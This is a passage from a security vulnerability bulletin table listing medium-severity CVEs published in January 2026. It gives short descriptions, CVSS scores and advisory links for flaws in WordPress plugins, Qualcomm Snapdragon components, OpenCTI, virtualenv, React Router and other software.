| nahian91--Awesome Hotel Booking | The Awesome Hotel Booking plugin for WordPress is vulnerable to unauthorized modification of data due to incorrect authorization in the room-single.php shortcode handler in all versions up to, and including, 1.0. This is due to the plugin relying solely on nonce verification without capability checks. This makes it possible for unauthenticated attackers to modify arbitrary booking records by obtaining a nonce from the public booking form. | 2026-01-07 | 5.3 | CVE-2025-14352 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4fe0a08e-eee2-4d48-bb38-dd58bff79118?source=cve https://plugins.trac.wordpress.org/browser/awesome-hotel-booking/trunk/admin/admin-shortcodes/inc/room-single.php#L67 https://plugins.trac.wordpress.org/browser/awesome-hotel-booking/tags/1.0/admin/admin-shortcodes/inc/room-single.php#L67 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, in base64urlDecode, padding-stripping dereferences input[inputLen - 1] before checking that inputLen > 0 or that input != NULL. For inputLen == 0, this becomes an OOB read at input[-1], potentially crashing the process. If input == NULL and inputLen == 0, it dereferences NULL - 1. This issue has been patched in version 1.4.3. | 2026-01-10 | 4.7 | CVE-2026-21899 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-wc29-5hw7-mpj8 https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| Nawawi Jamili--Docket Cache | Missing Authorization vulnerability in Nawawi Jamili Docket Cache allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Docket Cache: from n/a through 24.07.04. | 2026-01-08 | 4.3 | CVE-2026-22492 | https://patchstack.com/database/wordpress/plugin/docket-cache/vulnerability/wordpress-docket-cache-plugin-24-07-04-broken-access-control-vulnerability?_s_id=cve |
| niklaslindemann--Bulk Landing Page Creator for WordPress LPagery | Missing Authorization vulnerability in niklaslindemann Bulk Landing Page Creator for WordPress LPagery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bulk Landing Page Creator for WordPress LPagery: from n/a through 2.4.9. | 2026-01-08 | 5.4 | CVE-2026-22490 | https://patchstack.com/database/wordpress/plugin/lpagery/vulnerability/wordpress-bulk-landing-page-creator-for-wordpress-lpagery-plugin-2-4-4-broken-access-control-vulnerability?_s_id=cve |
| ninjateam--FastDup Fastest WordPress Migration & Duplicator | The FastDup - Fastest WordPress Migration & Duplicator plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.7 via the 'dir_path' parameter in the 'njt-fastdup/v1/template/directory-tree' REST API endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary directories on the server, which can contain sensitive information. | 2026-01-06 | 6.5 | CVE-2026-0604 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac97c729-4c75-429b-bbf2-27ca322be1cf?source=cve https://plugins.trac.wordpress.org/browser/fastdup/trunk/includes/Endpoint/TemplateApi.php#L219 https://plugins.trac.wordpress.org/browser/fastdup/tags/2.7/includes/Endpoint/TemplateApi.php#L219 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432226%40fastdup&new=3432226%40fastdup&sfp_email=&sfph_mail=#file3 |
| nsthemes--NS Ie Compatibility Fixer | The NS IE Compatibility Fixer plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in all versions up to, and including, 2.1.5. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14845 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c25b462-cb9e-4250-bb17-9f2a0bd7665e?source=cve https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_admin_option_dashboard.php#L29 https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_admin_option_dashboard.php#L30 https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_settings_custom.php#L8 https://developer.wordpress.org/plugins/security/nonces/ https://developer.wordpress.org/reference/functions/wp_verify_nonce/ https://developer.wordpress.org/reference/functions/check_admin_referer/ |
| octobercms--october | October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerability was identified in October CMS backend configuration forms. A user with the Global Editor Settings permission could inject malicious HTML/JS into the stylesheet input at Markup Styles. A specially crafted input could break out of the intended <style> context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12. | 2026-01-10 | 6.1 | CVE-2025-61674 | https://github.com/octobercms/october/security/advisories/GHSA-gxxc-m74c-f48x |
| octobercms--october | October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerabilities was identified in October CMS backend configuration forms. A user with the Customize Backend Styles permission could inject malicious HTML/JS into the stylesheet input at Styles from Branding & Appearance settings. A specially crafted input could break out of the intended <style> context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12. | 2026-01-10 | 6.1 | CVE-2025-61676 | https://github.com/octobercms/october/security/advisories/GHSA-wvpq-h33f-8rp6 |
| openchamp--Simcast | The Simcast plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the settingsPage function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14077 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3917e1a-c230-46ad-9889-6ab233ecc4d0?source=cve https://plugins.trac.wordpress.org/browser/simcast/trunk/Simcast_OptionsManager.php#L257 https://plugins.trac.wordpress.org/browser/simcast/tags/1.0.0/Simcast_OptionsManager.php#L257 |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.8.3, an open redirect vulnerability exists in the OpenCTI platform's SAML authentication endpoint (/auth/saml/callback). By manipulating the RelayState parameter, an attacker can force the server to issue a 302 redirect to any external URL, enabling phishing, credential theft, and arbitrary site redirection. This issue has been patched in version 6.8.3. | 2026-01-07 | 5.4 | CVE-2025-61782 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-jc3f-c62g-v7qw https://github.com/OpenCTI-Platform/opencti/commit/f755165a26888925c4a58018f7238ff92a0bd378 https://github.com/OpenCTI-Platform/opencti/releases/tag/6.8.3 |
| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment within the Document Check Out functionality. The JavaScript is executed whenever another user views the Action History Log. Fixed in OPEXUS eCASE Platform 11.14.1.0. | 2026-01-08 | 5.5 | CVE-2026-22231 | url url url |
| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript in the "A or SIC Number" field within the Project Setup functionality. The JavaScript is executed whenever another user views the project. Fixed in OPEXUS eCASE Audit 11.14.2.0. | 2026-01-08 | 5.5 | CVE-2026-22232 | url url url |
| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment in the "Estimated Staff Hours" field. The JavaScript is executed whenever another user visits the Project Cost tab. Fixed in OPEXUS eCASE Audit 11.14.2.0. | 2026-01-08 | 5.5 | CVE-2026-22233 | url url url |
| opf--openproject | OpenProject is an open-source, web-based project management software. OpenProject versions prior to version 16.6.3, allowed users with the View Meetings permission on any project, to access meeting details of meetings that belonged to projects, the user does not have access to. This issue has been patched in version 16.6.3. | 2026-01-10 | 4.3 | CVE-2026-22605 | https://github.com/opf/openproject/security/advisories/GHSA-fq4m-pxvm-8x2j https://github.com/opf/openproject/releases/tag/v16.6.3 |
| P5--FNIP-8x16A | P5 FNIP-8x16A FNIP-4xSH 1.0.20 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to add new admin users, change passwords, and modify system configurations by tricking authenticated users into loading a specially crafted form. | 2026-01-06 | 4.3 | CVE-2020-36906 | ExploitDB-48362 Official Product Homepage Zero Science Lab Disclosure (ZSL-2020-5564) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange 1 IBM X-Force Vulnerability Exchange 2 VulnCheck Advisory: P5 FNIP-8x16A FNIP-4xSH 1.0.20 Cross-Site Request Forgery via User Management |
| pagup--Bulk Auto Image Alt Text (Alt tag, Alt attribute) optimizer (image SEO) | The BIALTY - Bulk Image Alt Text (Alt tag, Alt Attribute) with Yoast SEO + WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'bialty_cs_alt' post meta in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the post editor. | 2026-01-09 | 6.4 | CVE-2025-15019 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0af219a7-6596-47b2-ab8e-a71f20218759?source=cve https://plugins.trac.wordpress.org/changeset/3431985/bulk-image-alt-text-with-yoast/trunk/admin/views/metabox.view.php |
| pagup--WP Google Street View (with 360 virtual tour) & Google maps + Local SEO | The WP Google Street View (with 360° virtual tour) & Google maps + Local SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpgsv_map' shortcode in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2026-0563 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2bc8a3fb-176e-4bf0-b96e-6ccb9688254b?source=cve https://plugins.trac.wordpress.org/changeset/3432185/wp-google-street-view/trunk/includes/shortcode.php |
| Parsl--parsl | Parsl is a Python parallel scripting library. A SQL Injection vulnerability exists in the parsl-visualize component of versions prior to 2026.01.05. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against the monitoring database. Version 2026.01.05 fixes the issue. | 2026-01-08 | 5.3 | CVE-2026-21892 | https://github.com/Parsl/parsl/security/advisories/GHSA-f2mf-q878-gh58 https://github.com/Parsl/parsl/commit/013a928461e70f38a33258bd525a351ed828e974 |
| Passionate Brains--GA4WP: Google Analytics for WordPress | Missing Authorization vulnerability in Passionate Brains GA4WP: Google Analytics for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GA4WP: Google Analytics for WordPress: from n/a through 2.10.0. | 2026-01-08 | 5.4 | CVE-2026-22517 | https://patchstack.com/database/wordpress/plugin/ga-for-wp/vulnerability/wordpress-ga4wp-google-analytics-for-wordpress-plugin-2-10-0-broken-access-control-vulnerability?_s_id=cve |
| pencilwp--X Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pencilwp X Addons for Elementor allows DOM-Based XSS.This issue affects X Addons for Elementor: from n/a through 1.0.23. | 2026-01-08 | 6.5 | CVE-2026-22518 | https://patchstack.com/database/wordpress/plugin/x-addons-elementor/vulnerability/wordpress-x-addons-for-elementor-plugin-1-0-23-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PHPGurukul--Online Course Registration System | A vulnerability was determined in PHPGurukul Online Course Registration System up to 3.1. This impacts an unknown function of the file /onlinecourse/admin/manage-students.php. This manipulation of the argument id/cid causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-08 | 6.3 | CVE-2026-0733 | VDB-340130 | PHPGurukul Online Course Registration System manage-students.php sql injection VDB-340130 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733328 | PHPGurukul Online Course Registration System ≤ 3.1 SQL Injection Vulnerability Submit #733331 | PHPGurukul Online Course Registration System ≤ 3.1 SQL Injection (Duplicate) https://note-hxlab.wetolink.com/share/cU33RBoPPAF0 https://note-hxlab.wetolink.com/share/Tma34bofeB2L https://phpgurukul.com/ |
| PHPGurukul--Online Course Registration System | A vulnerability was found in PHPGurukul Online Course Registration System up to 3.1. This affects an unknown part of the file /enroll.php. The manipulation of the argument studentregno/Pincode/session/department/level/course/sem results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-01-09 | 6.3 | CVE-2026-0803 | VDB-340255 | PHPGurukul Online Course Registration System enroll.php sql injection VDB-340255 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733344 | PHPGurukul Online Course Registration System ≤ 3.1 SQL Injection https://note-hxlab.wetolink.com/share/qX132pk8Wofk https://phpgurukul.com/ |
| pichel--WP Js List Pages Shortcodes | The WP Js List Pages Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' shortcode attribute in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14110 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3f8dced7-cbe1-4d50-9fa0-1cf441dddefa?source=cve https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/tags/1.21/js-list-pages-shortcodes.php#L58 https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L47 https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L50 https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L58 |
| POSIMYTH Innovation--The Plus Addons for Elementor Pro | Missing Authorization vulnerability in POSIMYTH Innovation The Plus Addons for Elementor Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Plus Addons for Elementor Pro: from n/a before 6.3.7. | 2026-01-07 | 6.5 | CVE-2025-46434 | https://patchstack.com/database/wordpress/plugin/theplus_elementor_addon/vulnerability/wordpress-the-plus-addons-for-elementor-pro-plugin-6-3-7-broken-access-control-vulnerability?_s_id=cve |
| POSIMYTH--The Plus Addons for Elementor Page Builder Lite | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in POSIMYTH The Plus Addons for Elementor Page Builder Lite allows DOM-Based XSS.This issue affects The Plus Addons for Elementor Page Builder Lite: from n/a through 5.3.3. | 2026-01-05 | 6.5 | CVE-2024-23511 | https://vdp.patchstack.com/database/wordpress/plugin/the-plus-addons-for-elementor-page-builder/vulnerability/wordpress-the-plus-addons-for-elementor-plugin-5-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pr-gateway--Blog2Social: Social Media Auto Post & Scheduler | The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 8.7.2. This is due to a misconfigured authorization check on the 'getShipItemFullText' function which only verifies that a user has the 'read' capability (Subscriber-level) and a valid nonce, but fails to verify whether the user has permission to access the specific post being requested. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract data from password-protected, private, or draft posts. | 2026-01-10 | 4.3 | CVE-2025-14943 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7374db91-4e7d-4db2-9c58-bb9bdda5c85d?source=cve https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Get.php#L243 https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Get.php?rev=3423620#L252 |
| praveentamil--Sticky Action Buttons | The Sticky Action Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the sabs_options_page_form_submit() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14465 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82b243c7-5b58-4765-9083-4660c0b479cc?source=cve https://plugins.trac.wordpress.org/browser/sticky-action-buttons/tags/1.0/sticky-action-buttons.php#L105 |
| premmerce--Premmerce WooCommerce Customers Manager | The Premmerce WooCommerce Customers Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'money_spent_from', 'money_spent_to', 'registered_from', and 'registered_to' parameters in all versions up to, and including, 1.1.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-13369 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9980ec20-60ae-42eb-a2cd-146e57435398?source=cve https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/src/Admin/Admin.php#L135 https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/src/Admin/Admin.php#L135 https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/views/admin/filter.php#L43 https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/views/admin/filter.php#L43 |
| Project-MONAI--MONAI | MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.1, a Path Traversal (Zip Slip) vulnerability exists in MONAI's `_download_from_ngc_private()` function. The function uses `zipfile.ZipFile.extractall()` without path validation, while other similar download functions in the same codebase properly use the existing `safe_extract_member()` function. Commit 4014c8475626f20f158921ae0cf98ed259ae4d59 fixes this issue. | 2026-01-07 | 5.3 | CVE-2026-21851 | https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-9rg3-9pvr-6p27 https://github.com/Project-MONAI/MONAI/commit/4014c8475626f20f158921ae0cf98ed259ae4d59 |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below allow TOTP to be used multiple times during its validity window. Users with 2FA enabled are prompted to enter a token during sign-in, and afterward it is not sufficiently marked as used in the system. This allows an attacker who intercepts that token to use it in addition to a known username/password during the 60-second token validity window. The attacker must have intercepted a valid 2FA token (for example, during a screen share). This issue is fixed in version 1.12.0. | 2026-01-06 | 6.5 | CVE-2025-69197 | https://github.com/pterodactyl/panel/security/advisories/GHSA-rgmp-4873-r683 https://github.com/pterodactyl/panel/commit/032bf076d92bb2f929fa69c1bac1b89f26b8badf https://github.com/pterodactyl/panel/releases/tag/v1.12.0 |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.9.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to create, update, delete, and publish malicious workflows that may automatically delete any post upon publication or update, including posts created by administrators. | 2026-01-09 | 5.4 | CVE-2025-14718 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8198d81a-40c0-49c1-8c38-f5ef6fb911ad?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/post-expirator/tags/4.9.3/src/Modules/Workflows/Rest/RestApiV1.php&new_path=/post-expirator/tags/4.9.4/src/Modules/Workflows/Rest/RestApiV1.php |
| pypa--virtualenv | virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1. | 2026-01-10 | 4.5 | CVE-2026-22702 | https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986 https://github.com/pypa/virtualenv/pull/3013 https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc |
| Qualcomm, Inc.--Snapdragon | Information disclosure while processing a firmware event. | 2026-01-06 | 6.1 | CVE-2025-47331 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a config call from userspace. | 2026-01-06 | 6.7 | CVE-2025-47332 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling buffer mapping operations in the cryptographic driver. | 2026-01-06 | 6.6 | CVE-2025-47333 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing shared command buffer packet between camera userspace and kernel. | 2026-01-06 | 6.7 | CVE-2025-47334 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while parsing clock configuration data for a specific hardware type. | 2026-01-06 | 6.7 | CVE-2025-47335 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while performing sensor register read operations. | 2026-01-06 | 6.7 | CVE-2025-47336 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while accessing a synchronization object during concurrent operations. | 2026-01-06 | 6.7 | CVE-2025-47337 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling sensor utility operations. | 2026-01-06 | 6.7 | CVE-2025-47344 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS while parsing a WLAN management frame with a Vendor Specific Information Element. | 2026-01-06 | 6.5 | CVE-2025-47395 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS while parsing video packets received from the video firmware. | 2026-01-06 | 5.5 | CVE-2025-47330 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Information disclosure when a weak hashed value is returned to userland code in response to a IOCTL call to obtain a session ID. | 2026-01-06 | 5.5 | CVE-2025-47369 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Missing Authorization vulnerability, allowing authenticated remote attackers to modify specific network packet parameters, enabling certain system functions to access other users' files. | 2026-01-05 | 6.5 | CVE-2025-15235 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2026-01-05 | 6.5 | CVE-2025-15238 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2026-01-05 | 6.5 | CVE-2025-15239 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability. | 2026-01-05 | 4.3 | CVE-2025-15236 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability. | 2026-01-05 | 4.3 | CVE-2025-15237 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| quarkusio--quarkus | Quarkus is a Cloud Native, (Linux) Container First framework for writing Java applications. Prior to versions 3.31.0, 3.27.2, and 3.20.5, a vulnerability exists in the HTTP layer of Quarkus REST related to response handling. When a response is being written, the framework waits for previously written response chunks to be fully transmitted before proceeding. If the client connection is dropped during this waiting period, the associated worker thread is never released and becomes permanently blocked. Under sustained or repeated occurrences, this can exhaust the available worker threads, leading to degraded performance, or complete unavailability of the application. This issue has been patched in versions 3.31.0, 3.27.2, and 3.20.5. A workaround involves implementing a health check that monitors the status and saturation of the worker thread pool to detect abnormal thread retention early. | 2026-01-07 | 5.9 | CVE-2025-66560 | https://github.com/quarkusio/quarkus/security/advisories/GHSA-5rfx-cp42-p624 |
| quickjs-ng--quickjs | A vulnerability was identified in quickjs-ng quickjs up to 0.11.0. This issue affects the function js_typed_array_sort of the file quickjs.c. The manipulation leads to heap-based buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The identifier of the patch is 53eefbcd695165a3bd8c584813b472cb4a69fbf5. To fix this issue, it is recommended to deploy a patch. | 2026-01-10 | 6.3 | CVE-2026-0822 | VDB-340356 | quickjs-ng quickjs quickjs.c js_typed_array_sort heap-based overflow VDB-340356 | CTI Indicators (IOB, IOC, IOA) Submit #731783 | quickjs-ng quickjs v0.11.0 Heap-based Buffer Overflow https://github.com/quickjs-ng/quickjs/issues/1297 https://github.com/quickjs-ng/quickjs/pull/1298 https://github.com/quickjs-ng/quickjs/issues/1297#issue-3780006202 https://github.com/quickjs-ng/quickjs/commit/53eefbcd695165a3bd8c584813b472cb4a69fbf5 |
| RainyGao--DocSys | A vulnerability was detected in RainyGao DocSys up to 2.02.36. The affected element is an unknown function of the file src/com/DocSystem/mapping/GroupMemberMapper.xml. Performing a manipulation of the argument searchWord results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 6.3 | CVE-2025-15492 | VDB-340270 | RainyGao DocSys GroupMemberMapper.xml sql injection VDB-340270 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725373 | https://github.com/RainyGao-GitHub/DocSys/releases/tag/DocSys_V2 RainyGao-GitHub 2.02.36 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A53.md https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A53.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0 |
| RainyGao--DocSys | A flaw has been found in RainyGao DocSys up to 2.02.36. The impacted element is an unknown function of the file src/com/DocSystem/mapping/ReposAuthMapper.xml. Executing a manipulation of the argument searchWord can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 6.3 | CVE-2025-15493 | VDB-340271 | RainyGao DocSys ReposAuthMapper.xml sql injection VDB-340271 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725374 | https://github.com/RainyGao-GitHub/DocSys/releases/tag/DocSys_V2 RainyGao-GitHub 2.02.36 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0 |
| RainyGao--DocSys | A vulnerability has been found in RainyGao DocSys up to 2.02.37. This affects an unknown function of the file com/DocSystem/mapping/UserMapper.xml. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 6.3 | CVE-2025-15494 | VDB-340272 | RainyGao DocSys UserMapper.xml sql injection VDB-340272 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725407 | https://github.com/RainyGao-GitHub/DocSys/releases/tag/DocSys_V2 RainyGao-GitHub 2.02.37 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A52.02.37.md https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A52.02.37.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. The Keycloak Authorization header parser is overly permissive regarding the formatting of the "Bearer" authentication scheme. It accepts non-standard characters (such as tabs) as separators and tolerates case variations that deviate from RFC 6750 specifications. | 2026-01-08 | 5.3 | CVE-2026-0707 | https://access.redhat.com/security/cve/CVE-2026-0707 RHBZ#2427768 |
| remix-run--react-router | React Router is a router for React. In versions 6.0.0 through 6.30.1 and 7.0.0 through 7.9.5, an attacker-supplied path can be crafted so that when a React Router application navigates to it via navigate(), <Link>, or redirect(), the app performs a navigation/redirect to an external URL. This is only an issue if you are passing untrusted content into navigation paths in your application code. This issue has been patched in versions 6.30.2 and 7.9.6. | 2026-01-10 | 6.5 | CVE-2025-68470 | https://github.com/remix-run/react-router/security/advisories/GHSA-9jcx-v3wj-wh4m |
